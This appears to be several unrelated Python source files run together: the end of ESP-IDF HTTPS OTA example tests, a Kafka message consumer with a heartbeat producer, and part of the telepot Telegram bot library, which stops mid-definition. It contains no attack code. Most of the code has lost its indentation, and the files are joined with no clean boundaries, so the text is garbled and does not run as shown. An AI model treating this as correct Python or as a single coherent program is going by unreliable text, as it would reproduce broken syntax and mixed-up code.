ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
Utility.console_log('ENV_TEST_FAILURE: Cannot connect to AP')
raise
thread1.terminate()
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
for _ in range(http_requests):
dut1.expect('Connection closed', timeout=60)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
dut1.reset()
thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA', nightly_run=True)
def test_examples_protocol_advanced_https_ota_example_nimble_gatts(env, extra_data):
"""
    Run an OTA image update while a BLE GATT server is running in the background. The GATT server uses the NimBLE host stack.
steps: |
1. join AP
2. Run BLE advertise and then GATT server.
3. Fetch OTA image over HTTPS
4. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT, app_config_name='nimble')
server_port = 8001
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.expect('GAP procedure initiated: advertise', timeout=30)
print('Started GAP advertising.')
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
dut1.reset()
thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='Example_WIFI_OTA', nightly_run=True)
def test_examples_protocol_advanced_https_ota_example_bluedroid_gatts(env, extra_data):
"""
    Run an OTA image update while a BLE GATT server is running in the background. The GATT server uses the Bluedroid host stack.
steps: |
1. join AP
2. Run BLE advertise and then GATT server.
3. Fetch OTA image over HTTPS
4. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT, app_config_name='bluedroid')
server_port = 8001
# File to be downloaded. This file is generated after compilation
bin_name = 'advanced_https_ota.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('advanced_https_ota_bin_size', '{}KB'.format(bin_size // 1024))
# start test
host_ip = get_my_ip()
if (get_server_status(host_ip, server_port) is False):
thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' sta ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.terminate()
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
dut1.expect('Started advertising.', timeout=30)
print('Started GAP advertising.')
dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
dut1.reset()
thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_advanced_https_ota_example_openssl_aligned_bin(env, extra_data):
"""
    This is a test case for esp_http_client_read with a binary whose size is a multiple of 289 bytes
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut('advanced_https_ota_example', 'examples/system/ota/advanced_https_ota', dut_class=ttfw_idf.ESP32DUT)
# Original binary file generated after compilation
bin_name = 'advanced_https_ota.bin'
# Binary file aligned to DEFAULT_OTA_BUF_SIZE(289 bytes) boundary
aligned_bin_name = 'aligned.bin'
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, bin_name)
# Original binary size
bin_size = os.path.getsize(binary_file)
# Dummy data required to align binary size to 289 bytes boundary
dummy_data_size = 289 - (bin_size % 289)
f = open(binary_file, 'rb+')
fo = open(os.path.join(dut1.app.binary_path, aligned_bin_name), 'wb+')
fo.write(f.read(bin_size))
for _ in range(dummy_data_size):
fo.write(struct.pack('B', random.randrange(0,255,1)))
fo.close()
f.close()
# start test
host_ip = get_my_ip()
chunked_server = start_chunked_server(dut1.app.binary_path, 8070)
dut1.start_app()
dut1.expect('Loaded app from partition at offset', timeout=30)
try:
ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
print('Connected to AP with IP: {}'.format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
dut1.expect('Starting Advanced OTA example', timeout=30)
print('writing to device: {}'.format('https://' + host_ip + ':8070/' + aligned_bin_name))
dut1.write('https://' + host_ip + ':8070/' + aligned_bin_name)
dut1.expect('Loaded app from partition at offset', timeout=60)
dut1.expect('Starting Advanced OTA example', timeout=30)
chunked_server.kill()
os.remove(aligned_bin_name)
if __name__ == '__main__':
test_examples_protocol_advanced_https_ota_example()
test_examples_protocol_advanced_https_ota_example_chunked()
test_examples_protocol_advanced_https_ota_example_redirect_url()
test_examples_protocol_advanced_https_ota_example_truncated_bin()
test_examples_protocol_advanced_https_ota_example_truncated_header()
test_examples_protocol_advanced_https_ota_example_random()
test_examples_protocol_advanced_https_ota_example_anti_rollback()
test_examples_protocol_advanced_https_ota_example_partial_request()
test_examples_protocol_advanced_https_ota_example_nimble_gatts()
test_examples_protocol_advanced_https_ota_example_bluedroid_gatts()
test_examples_protocol_advanced_https_ota_example_openssl_aligned_bin()
|
async_consumer.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import time
import signal
import sys
import subprocess
import threading
import logging
from logging.config import fileConfig
from async_app.config import get_configs
from async_app.async.kafka import init_kafka_manager
from async_app.async.consumer import consume_dict
from async_app.store.manager import init_store_manager, get_store_manager
from async_app.task import do_async_task
from async_app.metrics.client import metrics_client
from async_app.async.kafka import get_kafka_manager
subprocess.call(["mkdir", "-p", "/logs/guldan"])
fileConfig("logging_config.ini", disable_existing_loggers=False)
logger = logging.getLogger(__name__)
print = logger.info
STOPPED = False
consumer = None
def consume_messages():
    while not STOPPED:
        try:
            message = consume_dict()
            do_async_task(message, get_store_manager())
            metrics_client.write_count("message_count", 1)
        except Exception:
            # A bare except would also catch the SystemExit raised by the
            # signal handler, which would keep the loop running forever.
            logger.exception("exc when consuming messages")
            metrics_client.write_exc("consume_exc", 1)
def exit_signal_handler(signal, frame):
print("signal {} received, about to exit ...".format(signal))
sys.exit(0)
def equip_signal():
signal.signal(signal.SIGINT, exit_signal_handler)
signal.signal(signal.SIGTERM, exit_signal_handler)
def heartbeat_producer():
while True:
try:
get_kafka_manager().send_dict({
"item_name": "test.test.test",
"puller_hash": "guldan_puller_hash",
"remote_addr": "127.0.0.1",
"iver": "1",
"cver": "0.1",
"ctype": "fake",
"cid": "1",
"lver": "last_version",
"pull_time": int(time.time())
})
        except Exception:
logger.exception("exc in heartbeat producer")
finally:
time.sleep(1)
def start_heartbeat_producer():
threading.Thread(target=heartbeat_producer).start()
def run():
equip_signal()
configs = get_configs()
print("init kafka manager ...")
init_kafka_manager(configs)
print("start heartbeat producer ...")
start_heartbeat_producer()
print("init store manager ...")
init_store_manager(configs.get("redis_url"))
print("start to consume messages ...")
consume_messages()
if __name__ == "__main__":
run()
|
__init__.py
|
import sys
import io
import time
import json
import threading
import traceback
import collections
import bisect
try:
import Queue as queue
except ImportError:
import queue
# Patch urllib3 for sending unicode filename
from . import hack
from . import exception
__version_info__ = (12, 7)
__version__ = '.'.join(map(str, __version_info__))
def flavor(msg):
"""
Return flavor of message or event.
A message's flavor may be one of these:
- ``chat``
- ``callback_query``
- ``inline_query``
- ``chosen_inline_result``
- ``shipping_query``
- ``pre_checkout_query``
An event's flavor is determined by the single top-level key.
"""
if 'message_id' in msg:
return 'chat'
elif 'id' in msg and 'chat_instance' in msg:
return 'callback_query'
elif 'id' in msg and 'query' in msg:
return 'inline_query'
elif 'result_id' in msg:
return 'chosen_inline_result'
elif 'id' in msg and 'shipping_address' in msg:
return 'shipping_query'
elif 'id' in msg and 'total_amount' in msg:
return 'pre_checkout_query'
else:
top_keys = list(msg.keys())
if len(top_keys) == 1:
return top_keys[0]
raise exception.BadFlavor(msg)
chat_flavors = ['chat']
inline_flavors = ['inline_query', 'chosen_inline_result']
def _find_first_key(d, keys):
for k in keys:
if k in d:
return k
raise KeyError('No suggested keys %s in %s' % (str(keys), str(d)))
all_content_types = [
'text', 'audio', 'document', 'game', 'photo', 'sticker', 'video', 'voice', 'video_note',
'contact', 'location', 'venue', 'new_chat_member', 'left_chat_member', 'new_chat_title',
'new_chat_photo', 'delete_chat_photo', 'group_chat_created', 'supergroup_chat_created',
'channel_chat_created', 'migrate_to_chat_id', 'migrate_from_chat_id', 'pinned_message',
'new_chat_members', 'invoice', 'successful_payment'
]
def glance(msg, flavor='chat', long=False):
"""
Extract "headline" info about a message.
Use parameter ``long`` to control whether a short or long tuple is returned.
When ``flavor`` is ``chat``
(``msg`` being a `Message <https://core.telegram.org/bots/api#message>`_ object):
- short: (content_type, ``msg['chat']['type']``, ``msg['chat']['id']``)
- long: (content_type, ``msg['chat']['type']``, ``msg['chat']['id']``, ``msg['date']``, ``msg['message_id']``)
*content_type* can be: ``text``, ``audio``, ``document``, ``game``, ``photo``, ``sticker``, ``video``, ``voice``,
``video_note``, ``contact``, ``location``, ``venue``, ``new_chat_member``, ``left_chat_member``, ``new_chat_title``,
``new_chat_photo``, ``delete_chat_photo``, ``group_chat_created``, ``supergroup_chat_created``,
``channel_chat_created``, ``migrate_to_chat_id``, ``migrate_from_chat_id``, ``pinned_message``,
``new_chat_members``, ``invoice``, ``successful_payment``.
When ``flavor`` is ``callback_query``
(``msg`` being a `CallbackQuery <https://core.telegram.org/bots/api#callbackquery>`_ object):
- regardless: (``msg['id']``, ``msg['from']['id']``, ``msg['data']``)
When ``flavor`` is ``inline_query``
(``msg`` being a `InlineQuery <https://core.telegram.org/bots/api#inlinequery>`_ object):
- short: (``msg['id']``, ``msg['from']['id']``, ``msg['query']``)
- long: (``msg['id']``, ``msg['from']['id']``, ``msg['query']``, ``msg['offset']``)
When ``flavor`` is ``chosen_inline_result``
(``msg`` being a `ChosenInlineResult <https://core.telegram.org/bots/api#choseninlineresult>`_ object):
- regardless: (``msg['result_id']``, ``msg['from']['id']``, ``msg['query']``)
When ``flavor`` is ``shipping_query``
(``msg`` being a `ShippingQuery <https://core.telegram.org/bots/api#shippingquery>`_ object):
- regardless: (``msg['id']``, ``msg['from']['id']``, ``msg['invoice_payload']``)
When ``flavor`` is ``pre_checkout_query``
(``msg`` being a `PreCheckoutQuery <https://core.telegram.org/bots/api#precheckoutquery>`_ object):
- short: (``msg['id']``, ``msg['from']['id']``, ``msg['invoice_payload']``)
- long: (``msg['id']``, ``msg['from']['id']``, ``msg['invoice_payload']``, ``msg['currency']``, ``msg['total_amount']``)
"""
def gl_chat():
content_type = _find_first_key(msg, all_content_types)
if long:
return content_type, msg['chat']['type'], msg['chat']['id'], msg['date'], msg['message_id']
else:
return content_type, msg['chat']['type'], msg['chat']['id']
def gl_callback_query():
return msg['id'], msg['from']['id'], msg['data']
def gl_inline_query():
if long:
return msg['id'], msg['from']['id'], msg['query'], msg['offset']
else:
return msg['id'], msg['from']['id'], msg['query']
def gl_chosen_inline_result():
return msg['result_id'], msg['from']['id'], msg['query']
def gl_shipping_query():
return msg['id'], msg['from']['id'], msg['invoice_payload']
def gl_pre_checkout_query():
if long:
return msg['id'], msg['from']['id'], msg['invoice_payload'], msg['currency'], msg['total_amount']
else:
return msg['id'], msg['from']['id'], msg['invoice_payload']
try:
fn = {'chat': gl_chat,
'callback_query': gl_callback_query,
'inline_query': gl_inline_query,
'chosen_inline_result': gl_chosen_inline_result,
'shipping_query': gl_shipping_query,
'pre_checkout_query': gl_pre_checkout_query}[flavor]
except KeyError:
raise exception.BadFlavor(flavor)
return fn()
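# Hedged usage sketch (not part of the original source): a typical update
# handler pairs flavor() with glance() to branch on the update type.
def _example_route_update(msg):
    f = flavor(msg)
    if f == 'chat':
        content_type, chat_type, chat_id = glance(msg)         # short 3-tuple
        return 'chat message in %s %s: %s' % (chat_type, chat_id, content_type)
    elif f == 'callback_query':
        query_id, from_id, query_data = glance(msg, flavor=f)  # always a 3-tuple
        return 'callback %s from %s: %s' % (query_id, from_id, query_data)
    else:
        return 'unhandled flavor: %s' % f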
def flance(msg, long=False):
"""
A combination of :meth:`telepot.flavor` and :meth:`telepot.glance`,
return a 2-tuple (flavor, headline_info), where *headline_info* is whatever extracted by
:meth:`telepot.glance` depending on the message flavor and the ``long`` parameter.
"""
f = flavor(msg)
g = glance(msg, flavor=f, long=long)
return f,g
def peel(event):
"""
Remove an event's top-level skin (where its flavor is determined), and return
the core content.
"""
return list(event.values())[0]
def fleece(event):
"""
A combination of :meth:`telepot.flavor` and :meth:`telepot.peel`,
return a 2-tuple (flavor, content) of an event.
"""
return flavor(event), peel(event)
def is_event(msg):
"""
Return whether the message looks like an event. That is, whether it has a flavor
that starts with an underscore.
"""
return flavor(msg).startswith('_')
def origin_identifier(msg):
"""
Extract the message identifier of a callback query's origin. Returned value
is guaranteed to be a tuple.
``msg`` is expected to be ``callback_query``.
"""
if 'message' in msg:
return msg['message']['chat']['id'], msg['message']['message_id']
elif 'inline_message_id' in msg:
return msg['inline_message_id'],
else:
raise ValueError()
def message_identifier(msg):
"""
Extract an identifier for message editing. Useful with :meth:`telepot.Bot.editMessageText`
and similar methods. Returned value is guaranteed to be a tuple.
    ``msg`` is expected to be ``chat`` or ``chosen_inline_result``.
"""
if 'chat' in msg and 'message_id' in msg:
return msg['chat']['id'], msg['message_id']
elif 'inline_message_id' in msg:
return msg['inline_message_id'],
else:
raise ValueError()
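# Hedged usage sketch (not part of the original source; assumes a Bot with a
# valid token and a real chat id): message_identifier() turns a sent Message
# into the identifier accepted by editMessageText() and related methods.
def _example_edit_sent_message(bot, chat_id):
    sent = bot.sendMessage(chat_id, 'original text')
    ident = message_identifier(sent)        # -> (chat_id, message_id)
    return bot.editMessageText(ident, 'edited text')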
def _dismantle_message_identifier(f):
if isinstance(f, tuple):
if len(f) == 2:
return {'chat_id': f[0], 'message_id': f[1]}
elif len(f) == 1:
return {'inline_message_id': f[0]}
else:
raise ValueError()
else:
return {'inline_message_id': f}
def _split_input_media_array(media_array):
def ensure_dict(input_media):
if isinstance(input_media, tuple) and hasattr(input_media, '_asdict'):
return input_media._asdict()
elif isinstance(input_media, dict):
return input_media
else:
raise ValueError()
def given_attach_name(input_media):
if isinstance(input_media['media'], tuple):
return input_media['media'][0]
else:
return None
def attach_name_generator(used_names):
x = 0
while 1:
x += 1
name = 'media' + str(x)
if name in used_names:
                continue
yield name
def split_media(input_media, name_generator):
file_spec = input_media['media']
# file_id, URL
if _isstring(file_spec):
return (input_media, None)
# file-object
# (attach-name, file-object)
# (attach-name, (filename, file-object))
if isinstance(file_spec, tuple):
name, f = file_spec
else:
name, f = next(name_generator), file_spec
m = input_media.copy()
m['media'] = 'attach://' + name
return (m, (name, f))
ms = [ensure_dict(m) for m in media_array]
used_names = [given_attach_name(m) for m in ms if given_attach_name(m) is not None]
name_generator = attach_name_generator(used_names)
splitted = [split_media(m, name_generator) for m in ms]
legal_media, attachments = map(list, zip(*splitted))
files_to_attach = dict([a for a in attachments if a is not None])
return (legal_media, files_to_attach)
PY_3 = sys.version_info.major >= 3
_string_type = str if PY_3 else basestring
_file_type = io.IOBase if PY_3 else file
def _isstring(s):
return isinstance(s, _string_type)
def _isfile(f):
return isinstance(f, _file_type)
from . import helper
def flavor_router(routing_table):
router = helper.Router(flavor, routing_table)
return router.route
class _BotBase(object):
def __init__(self, token):
self._token = token
self._file_chunk_size = 65536
def _strip(params, more=[]):
return {key: value for key,value in params.items() if key not in ['self']+more}
def _rectify(params):
def make_jsonable(value):
if isinstance(value, list):
return [make_jsonable(v) for v in value]
elif isinstance(value, dict):
return {k:make_jsonable(v) for k,v in value.items() if v is not None}
elif isinstance(value, tuple) and hasattr(value, '_asdict'):
return {k:make_jsonable(v) for k,v in value._asdict().items() if v is not None}
else:
return value
def flatten(value):
v = make_jsonable(value)
if isinstance(v, (dict, list)):
return json.dumps(v, separators=(',',':'))
else:
return v
# remove None, then json-serialize if needed
return {k: flatten(v) for k,v in params.items() if v is not None}
from . import api
class Bot(_BotBase):
class Scheduler(threading.Thread):
        # Events are ordered by timestamp; the `bisect` module keeps the event queue sorted.
Event = collections.namedtuple('Event', ['timestamp', 'data'])
Event.__eq__ = lambda self, other: self.timestamp == other.timestamp
Event.__ne__ = lambda self, other: self.timestamp != other.timestamp
Event.__gt__ = lambda self, other: self.timestamp > other.timestamp
Event.__ge__ = lambda self, other: self.timestamp >= other.timestamp
Event.__lt__ = lambda self, other: self.timestamp < other.timestamp
Event.__le__ = lambda self, other: self.timestamp <= other.timestamp
def __init__(self):
super(Bot.Scheduler, self).__init__()
self._eventq = []
self._lock = threading.RLock() # reentrant lock to allow locked method calling locked method
self._event_handler = None
def _locked(fn):
def k(self, *args, **kwargs):
with self._lock:
return fn(self, *args, **kwargs)
return k
@_locked
def _insert_event(self, data, when):
ev = self.Event(when, data)
bisect.insort(self._eventq, ev)
return ev
@_locked
def _remove_event(self, event):
# Find event according to its timestamp.
# Index returned should be one behind.
i = bisect.bisect(self._eventq, event)
# Having two events with identical timestamp is unlikely but possible.
# I am going to move forward and compare timestamp AND object address
# to make sure the correct object is found.
while i > 0:
i -= 1
e = self._eventq[i]
if e.timestamp != event.timestamp:
raise exception.EventNotFound(event)
elif id(e) == id(event):
self._eventq.pop(i)
return
raise exception.EventNotFound(event)
@_locked
def _pop_expired_event(self):
if not self._eventq:
return None
if self._eventq[0].timestamp <= time.time():
return self._eventq.pop(0)
else:
return None
def event_at(self, when, data):
"""
Schedule some data to emit at an absolute timestamp.
:type when: int or float
:type data: dictionary
:return: an internal Event object
"""
return self._insert_event(data, when)
def event_later(self, delay, data):
"""
Schedule some data to emit after a number of seconds.
:type delay: int or float
:type data: dictionary
:return: an internal Event object
"""
return self._insert_event(data, time.time()+delay)
def event_now(self, data):
"""
Emit some data as soon as possible.
:type data: dictionary
:return: an internal Event object
"""
return self._insert_event(data, time.time())
def cancel(self, event):
"""
Cancel an event.
:type event: an internal Event object
"""
self._remove_event(event)
def run(self):
while 1:
e = self._pop_expired_event()
while e:
if callable(e.data):
d = e.data() # call the data-producing function
if d is not None:
self._event_handler(d)
else:
self._event_handler(e.data)
e = self._pop_expired_event()
time.sleep(0.1)
def run_as_thread(self):
self.daemon = True
self.start()
def on_event(self, fn):
self._event_handler = fn
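    # Hedged usage sketch (not part of the original source): the scheduler runs
    # in its own thread and hands every expired event's data to the single
    # handler registered with on_event().
    #
    #     sched = Bot.Scheduler()
    #     sched.on_event(print)                 # handler for emitted data
    #     sched.run_as_thread()
    #     sched.event_later(5, {'_ping': 1})    # emitted about 5 seconds later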
def __init__(self, token):
super(Bot, self).__init__(token)
self._scheduler = self.Scheduler()
self._router = helper.Router(flavor, {'chat': lambda msg: self.on_chat_message(msg),
'callback_query': lambda msg: self.on_callback_query(msg),
'inline_query': lambda msg: self.on_inline_query(msg),
'chosen_inline_result': lambda msg: self.on_chosen_inline_result(msg)})
# use lambda to delay evaluation of self.on_ZZZ to runtime because
# I don't want to require defining all methods right here.
@property
def scheduler(self):
return self._scheduler
@property
def router(self):
return self._router
def handle(self, msg):
self._router.route(msg)
def _api_request(self, method, params=None, files=None, **kwargs):
return api.request((self._token, method, params, files), **kwargs)
def _api_request_with_file(self, method, params, file_key, file_value, **kwargs):
if _isstring(file_value):
params[file_key] = file_value
return self._api_request(method, _rectify(params), **kwargs)
else:
files = {file_key: file_value}
return self._api_request(method, _rectify(params), files, **kwargs)
def getMe(self):
""" See: https://core.telegram.org/bots/api#getme """
return self._api_request('getMe')
def sendMessage(self, chat_id, text,
parse_mode=None,
disable_web_page_preview=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendmessage """
p = _strip(locals())
return self._api_request('sendMessage', _rectify(p))
def forwardMessage(self, chat_id, from_chat_id, message_id,
disable_notification=None):
""" See: https://core.telegram.org/bots/api#forwardmessage """
p = _strip(locals())
return self._api_request('forwardMessage', _rectify(p))
def sendPhoto(self, chat_id, photo,
caption=None,
parse_mode=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendphoto
:param photo:
- string: ``file_id`` for a photo existing on Telegram servers
- string: HTTP URL of a photo from the Internet
- file-like object: obtained by ``open(path, 'rb')``
- tuple: (filename, file-like object). If the filename contains
non-ASCII characters and you are using Python 2.7, make sure the
filename is a unicode string.
"""
p = _strip(locals(), more=['photo'])
return self._api_request_with_file('sendPhoto', _rectify(p), 'photo', photo)
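    # Hedged usage sketch (assumes a Bot instance, a real chat id, and a local
    # file; not part of the original source): common ways to pass ``photo``.
    #     bot.sendPhoto(chat_id, 'AgADBAAD...')                    # file_id already on Telegram servers
    #     bot.sendPhoto(chat_id, 'https://example.com/photo.jpg')  # HTTP URL
    #     bot.sendPhoto(chat_id, open('photo.jpg', 'rb'))          # upload a local file object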
def sendAudio(self, chat_id, audio,
caption=None,
parse_mode=None,
duration=None,
performer=None,
title=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendaudio
:param audio: Same as ``photo`` in :meth:`telepot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['audio'])
return self._api_request_with_file('sendAudio', _rectify(p), 'audio', audio)
def sendDocument(self, chat_id, document,
caption=None,
parse_mode=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#senddocument
:param document: Same as ``photo`` in :meth:`telepot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['document'])
return self._api_request_with_file('sendDocument', _rectify(p), 'document', document)
def sendVideo(self, chat_id, video,
duration=None,
width=None,
height=None,
caption=None,
parse_mode=None,
supports_streaming=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendvideo
:param video: Same as ``photo`` in :meth:`telepot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['video'])
return self._api_request_with_file('sendVideo', _rectify(p), 'video', video)
def sendVoice(self, chat_id, voice,
caption=None,
parse_mode=None,
duration=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendvoice
:param voice: Same as ``photo`` in :meth:`telepot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['voice'])
return self._api_request_with_file('sendVoice', _rectify(p), 'voice', voice)
def sendVideoNote(self, chat_id, video_note,
duration=None,
length=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendvideonote
:param video_note: Same as ``photo`` in :meth:`telepot.Bot.sendPhoto`
:param length:
Although marked as optional, this method does not seem to work without
it being specified. Supply any integer you want. It seems to have no effect
on the video note's display size.
"""
p = _strip(locals(), more=['video_note'])
return self._api_request_with_file('sendVideoNote', _rectify(p), 'video_note', video_note)
def sendMediaGroup(self, chat_id, media,
disable_notification=None,
reply_to_message_id=None):
"""
See: https://core.telegram.org/bots/api#sendmediagroup
:type media: array of `InputMedia <https://core.telegram.org/bots/api#inputmedia>`_ objects
:param media:
To indicate media locations, each InputMedia object's ``media`` field
should be one of these:
- string: ``file_id`` for a file existing on Telegram servers
- string: HTTP URL of a file from the Internet
- file-like object: obtained by ``open(path, 'rb')``
- tuple: (form-data name, file-like object)
- tuple: (form-data name, (filename, file-like object))
In case of uploading, you may supply customized multipart/form-data
names for each uploaded file (as in last 2 options above). Otherwise,
telepot assigns unique names to each uploaded file. Names assigned by
telepot will not collide with user-supplied names, if any.
"""
p = _strip(locals(), more=['media'])
legal_media, files_to_attach = _split_input_media_array(media)
p['media'] = legal_media
return self._api_request('sendMediaGroup', _rectify(p), files_to_attach)
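    # Hedged usage sketch (assumes a real chat id and a local file; not part of
    # the original source): mixing an HTTP URL with an uploaded file.
    #     bot.sendMediaGroup(chat_id, [
    #         {'type': 'photo', 'media': 'https://example.com/a.jpg'},
    #         {'type': 'photo', 'media': open('b.jpg', 'rb')},  # telepot assigns the attach name
    #     ])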
def sendLocation(self, chat_id, latitude, longitude,
live_period=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendlocation """
p = _strip(locals())
return self._api_request('sendLocation', _rectify(p))
def editMessageLiveLocation(self, msg_identifier, latitude, longitude,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#editmessagelivelocation
:param msg_identifier: Same as in :meth:`.Bot.editMessageText`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('editMessageLiveLocation', _rectify(p))
def stopMessageLiveLocation(self, msg_identifier,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#stopmessagelivelocation
:param msg_identifier: Same as in :meth:`.Bot.editMessageText`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('stopMessageLiveLocation', _rectify(p))
def sendVenue(self, chat_id, latitude, longitude, title, address,
foursquare_id=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendvenue """
p = _strip(locals())
return self._api_request('sendVenue', _rectify(p))
def sendContact(self, chat_id, phone_number, first_name,
last_name=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendcontact """
p = _strip(locals())
return self._api_request('sendContact', _rectify(p))
def sendGame(self, chat_id, game_short_name,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendgame """
p = _strip(locals())
return self._api_request('sendGame', _rectify(p))
def sendInvoice(self, chat_id, title, description, payload,
provider_token, start_parameter, currency, prices,
provider_data=None,
photo_url=None,
photo_size=None,
photo_width=None,
photo_height=None,
need_name=None,
need_phone_number=None,
need_email=None,
need_shipping_address=None,
is_flexible=None,
disable_notification=None,
reply_to_message_id=None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendinvoice """
p = _strip(locals())
return self._api_request('sendInvoice', _rectify(p))
def sendChatAction(self, chat_id, action):
""" See: https://core.telegram.org/bots/api#sendchataction """
p = _strip(locals())
return self._api_request('sendChatAction', _rectify(p))
def getUserProfilePhotos(self, user_id,
offset=None,
limit=None):
""" See: https://core.telegram.org/bots/api#getuserprofilephotos """
p = _strip(locals())
return self._api_request('getUserProfilePhotos', _rectify(p))
def getFile(self, file_id):
""" See: https://core.telegram.org/bots/api#getfile """
p = _strip(locals())
return self._api_request('getFile', _rectify(p))
def kickChatMember(self, chat_id, user_id,
until_date=None):
""" See: https://core.telegram.org/bots/api#kickchatmember """
p = _strip(locals())
return self._api_request('kickChatMember', _rectify(p))
def unbanChatMember(self, chat_id, user_id):
""" See: https://core.telegram.org/bots/api#unbanchatmember """
p = _strip(locals())
return self._api_request('unbanChatMember', _rectify(p))
def restrictChatMember(self, chat_id, user_id,
until_date=None,
can_send_messages=None,
can_send_media_messages=None,
can_send_other_messages=None,
can_add_web_page_previews=None):
""" See: https://core.telegram.org/bots/api#restrictchatmember """
p = _strip(locals())
return self._api_request('restrictChatMember', _rectify(p))
def promoteChatMember(self, chat_id, user_id,
can_change_info=None,
can_post_messages=None,
can_edit_messages=None,
can_delete_messages=None,
can_invite_users=None,
can_restrict_members=None,
can_pin_messages=None,
can_promote_members=None):
""" See: https://core.telegram.org/bots/api#promotechatmember """
p = _strip(locals())
return self._api_request('promoteChatMember', _rectify(p))
def exportChatInviteLink(self, chat_id):
""" See: https://core.telegram.org/bots/api#exportchatinvitelink """
p = _strip(locals())
return self._api_request('exportChatInviteLink', _rectify(p))
def setChatPhoto(self, chat_id, photo):
""" See: https://core.telegram.org/bots/api#setchatphoto """
p = _strip(locals(), more=['photo'])
return self._api_request_with_file('setChatPhoto', _rectify(p), 'photo', photo)
def deleteChatPhoto(self, chat_id):
""" See: https://core.telegram.org/bots/api#deletechatphoto """
p = _strip(locals())
return self._api_request('deleteChatPhoto', _rectify(p))
def setChatTitle(self, chat_id, title):
""" See: https://core.telegram.org/bots/api#setchattitle """
p = _strip(locals())
return self._api_request('setChatTitle', _rectify(p))
def setChatDescription(self, chat_id,
description=None):
""" See: https://core.telegram.org/bots/api#setchatdescription """
p = _strip(locals())
return self._api_request('setChatDescription', _rectify(p))
def pinChatMessage(self, chat_id, message_id,
disable_notification=None):
